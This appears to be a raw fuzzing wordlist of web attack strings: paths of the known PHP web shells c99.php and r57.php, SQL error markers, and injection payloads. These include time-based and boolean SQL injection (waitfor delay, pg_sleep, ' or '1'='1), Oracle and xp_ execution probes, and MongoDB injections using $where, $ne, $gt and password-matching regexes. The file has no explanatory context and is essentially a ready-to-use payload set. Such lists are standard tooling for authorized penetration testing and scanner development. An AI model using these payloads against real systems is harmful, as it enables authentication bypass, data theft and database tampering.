/c99.php
ERRORLOL
MySQL ERROR
Oracle ERROR
FATAL ERROR at SQL
/r57.php
%20waitfor%20delay%20
MD5(1))%20
)) and 0
or pg_sleep(__TIME__)
1 exec sp_ (or exec xp_)
1=utl_inaddr.get_host_address((
myappadmin.adduser('
’ or ‘1’=’1
' or '1'='1
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
